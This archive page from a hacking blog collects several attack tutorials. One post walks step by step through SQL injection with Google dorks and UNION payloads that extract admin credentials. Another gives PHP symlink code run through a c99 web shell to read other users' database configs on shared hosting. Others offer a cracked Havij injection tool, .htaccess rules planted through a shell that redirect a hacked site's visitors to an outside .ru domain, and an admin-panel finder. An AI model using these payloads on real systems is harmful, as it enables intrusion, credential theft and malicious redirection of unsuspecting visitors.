September 2012 ~ EthiCal HaCkeRs

SQl Injection Full Tutorial [Step By Step]

Posted by Anonymous On 02:20 2 comments

Keyword you need to know
-------------------------------
Character : ', -
Comments : /*, --
-------------------------------
Information: "Information_schema" just working our for version 5.x and above

Google Dork that will be used is ->

"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="

-------------------------First Step-------------------------

www.target.com/news.php?id=1
---add the character 'at the end of the url to see if the site is vuln to
sql injection or not.

inject sample code:-

www.target.com/news.php?id=1'
or
www.target.com/news.php?id=-1

Examples of error messages :-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1

warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

-------------------------Second Step-------------------------

Find the number of tables available in the database.
Add : +order+by+1-- at the end of url
Contoh:

Code:
www.target.com/news.php?id=1+order+by+1--
atau
www.target.com/news.php?id=1+order+by+1/* check in stages
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* keep looking untill error out

For this tutorial table amount obtained was 3.

-------------------------Third Step-------------------------

Use the Union command to remove the numbers that we use later.
order to be used : +union+select+1,2,3-- end of the url

Example
www.target.com/news.php?id=1+union+select+1,2,3--

Example: number 2 out.

then we enter the version() in number (2),

Example:
www.target.com/news.php?id=1+union+select+1,version(),3--

and the display version will appear in the figures.
Example:
5.1.47-community-log

------
|info|
------

version() = to see msql version used
database() = to see the database name used

-------------------------Fourth Step-------------------------

to see, the names of the table that is in the web, order
table_name park in the figures that came out earlier -> (2)
+from+information_schema.tables-- ---> park behind the last digit.

Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
or we add the command character- in front of the first digit
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--

-------------------------Step Fifth-------------------------
Remove all content is in the table,

group_concat(table_name) ---> park in the figures that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Put after the last digit.

Contoh:

www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

-------------------------Step Sixth-------------------------

Exit right content is in TABLE

group_concat(column_name) ---> park in the figures that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResulOfConvertedTextTableAdmin--

(TABLE NAME HAS BEEN PUT IN TO CONVERT HEXADECIMEL)

------
|info|
------
Website that can be used to convert the table name to hexadecimel
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

Column which we will use as example the table ADMIN
and convert results are 41444D494E

Example:

www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

-------------------------Step Seven-------------------------

Remove the contents of the results that we managed to get from table Admin

concat_ws(0x3a,"column names contained in the table ADMIN") ---> park in the figures that came out earlier (2)
+from+Admin-- --> The original column

Contoh:

www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--

And we obtain the username and password admin for the website.

Then You Has o Find The Admin Login :)....

More Short Tutorial:-
http://pastebin.com/pVVjSzhF

Symlinking (Priv8 Exploit) UrduHack Team

Posted by Anonymous On 02:16 No comments

Okeah Guy's, Here is the ExpLoiT for everyOne, Enjoy it, It's symlink_open_base_directory exploit.

Happy Symlinking peoples...

Here is download link:-
DOWNLOAD

I sincerely hope, You enjoy this..

Private Symlink (PHP) Exploit Tutorial

Posted by Anonymous On 02:13 No comments

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++
~*^...Symlink(PHP) Exploit Tutorial...^*~
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++

~*^...LEECHERS, DON'T MAKE ANY CHANGES IN THE Tutorial...^*~

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the victim's database If and only if the victim is in a shared host

Download the below Shell & Follow the steps.

================================================== ==============
Get Any C99 Shell
================================================== ==============

/Step 1 $ Upload the php i.e Shell.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================== ================================
http://www.yoursitename.com/shell.php
================================================== ================================

/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
@unlink($flib);

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

/Step 4 $ You should replace (xx) in the code in the upper two lines.

In the 1st xx in the line one, means the target username.

In the 2nd xx.xx in the line one, means the target file full path in other word it's

usually used to read database configuration files to to steel it's connection information.

xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"

$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,

and write the output.For @unlink you can search for them on php.net .

-- -- --- -- - -- -
Loading . .. ..
- - -- - -- - -- - -- - - -

__- -- - -- - - -- - --- - -- - -- - -- -

THE END.....

Havij 1.15 Pro Automatic SQl TOOl

Posted by Anonymous On 02:09 No comments

Havij is Powerful automated sql injection tool which injects the site automatically . You just have to put url and analyze Havij Finds vulnebrility and finds all the database of the site and u will also get admin data to hack a site havij is most used to hack admin panel of a site.

Functions
Sql injection : all types of sql injection
Admin finder
Md5 Cracker

How To register

1. havij and Click Register
2. In Name put Cracked@By.Exidous
3. And in key browse for haijvkey.lic which is in same directry of havij
4. and click register and enjoy

DOWNLOAD

Put HoAx Malware In WebSite [TuT0rial]

Posted by Anonymous On 02:06 No comments

Salam All.
Today i will teach you how to put hoax malware on website.
Don't ask me how to put real malware :P
Because i don't know

First of all,you need shell./evilz.php
after you get a shell,find directory "public_html"
Find the .htaccess code.
Paste this code

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]
RewriteEngine On
ErrorDocument 400 http://villusoftreit.ru/in.cgi?3
ErrorDocument 401 http://villusoftreit.ru/in.cgi?3
ErrorDocument 403 http://villusoftreit.ru/in.cgi?3
ErrorDocument 404 http://villusoftreit.ru/in.cgi?3
ErrorDocument 500 http://villusoftreit.ru/in.cgi?3

Then Save,You done :D!!!!

Thanks to JinCorn :)

1337 Admin PaneL Finder

Posted by Anonymous On 01:59 1 comment

It uses keywords in 10 languages
Choice response time
Choice user angent
Choice page sourse code
Mix list by ~ codex ~ includes php and asp paths
New method. What is this:
Here I will dwell a bit because there is nowhere Admin page finder in to do something similar. It was just an idea that was implemented
A smart administrator changes the default login url
Example from a http://localhost.gr/administrator/ to http://administrator.localhost.gr/
Thus makes it impossible to find using a simple admin page finder
The new method does just that. It takes url http://www.localhost.gr
Make the split and join http://www adding the path between http://www and localhost.gr forming the url http://administrator.localhost.gr/
shows user ip
shows site ip
shows reverse dns
Redirect σε online ip reverser
shows sites hosted on the same ip
shows robots.txt if it can be read
shows results found
shows Result not found
Download